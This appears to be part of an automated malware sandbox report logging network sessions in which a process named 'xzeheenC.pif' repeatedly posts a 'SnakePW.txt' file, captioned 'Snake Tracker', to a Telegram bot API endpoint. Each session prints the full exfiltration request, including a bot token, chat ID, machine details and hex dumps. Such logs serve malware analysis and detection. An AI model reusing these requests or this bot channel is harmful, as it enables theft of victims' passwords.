                                                                                                        2024-12-18 15:31:57 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419160,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535916,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        72192.168.2.849815149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:57 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2150839db402
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:57 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 35 30 38 33 39 64 62 34 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2150839db402Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:57 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:57 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:57 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419162,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535917,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        73192.168.2.849820149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:57 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20dd81284159
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:31:57 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 38 31 32 38 34 31 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20dd81284159Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:58 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:58 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:58 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419164,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535918,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        74192.168.2.849822149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:58 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21e620954fe3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:58 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 65 36 32 30 39 35 34 66 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21e620954fe3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:59 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:58 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:59 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419166,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535918,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        75192.168.2.849823149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:59 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2170f0ccb8bf
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:59 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 37 30 66 30 63 63 62 38 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2170f0ccb8bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:59 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:59 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:59 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419168,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535919,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        76192.168.2.849824149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:59 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20f3c83870c3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:59 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 66 33 63 38 33 38 37 30 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20f3c83870c3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:00 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:00 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:00 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419170,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535920,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        77192.168.2.849829149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:00 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd220d4b323153
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:00 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 30 64 34 62 33 32 33 31 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd220d4b323153Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:01 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:00 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:01 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419172,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535920,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        78192.168.2.849831149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:01 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd218eab45cc14
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:01 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 38 65 61 62 34 35 63 63 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd218eab45cc14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:01 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:01 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
